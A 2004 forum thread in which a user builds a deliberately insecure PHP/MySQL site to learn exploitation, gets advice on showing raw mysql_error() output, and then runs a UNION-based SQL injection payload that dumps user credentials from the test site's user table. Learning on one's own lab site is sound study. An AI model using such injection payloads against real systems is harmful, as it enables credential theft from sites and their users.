|
-
Jul 17th, 2004, 03:58 PM
#1
Thread Starter
Frenzied Member
create SQL errors instead of PHP [resolved]
OK. This might sound odd. I'm making a site which deliberately is insecure. I'm doing this to learn how to exploit it. When i cause a mySQL error I get an error displayed which PHP has made for me. is there a way to get the SQL error instead of the PHP error?
Last edited by Acidic; Jul 17th, 2004 at 04:37 PM.
Have I helped you? Please Rate my posts. 
-
Jul 17th, 2004, 04:20 PM
#2
-
Jul 17th, 2004, 04:22 PM
#3
And to prevent the PHP error from showing put an @ in front of the function which is producing it:
PHP Code:
$result = @mysql_query ($broken_sql);
if (! $result)
echo (mysql_error ());
-
Jul 17th, 2004, 04:35 PM
#4
Thread Starter
Frenzied Member
lovely, thanks. I knew about the @, but not the mysql_error().
Last edited by Acidic; Jul 18th, 2004 at 06:35 AM.
Have I helped you? Please Rate my posts. 
-
Jul 17th, 2004, 05:12 PM
#5
Finally :
I entered this into the user search:
Code:
' or 1=1 UNION ALL SELECT 1,password,2 FROM users WHERE '' = '
and got this:
Username: admin
Username: WhiteAcid
Username: Romeo
Username: Gandalf
Username: hax0r
Username: Amy
Username: Bob
Username: qwerty
Username: SQLInjection
Username: ILoveFlowers
Username: Ring
Username: 1337
Username: GiRl
Username: theBuilder
-
Jul 17th, 2004, 05:15 PM
#6
Thread Starter
Frenzied Member
well done. all usernames and passwords.
Have I helped you? Please Rate my posts. 
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|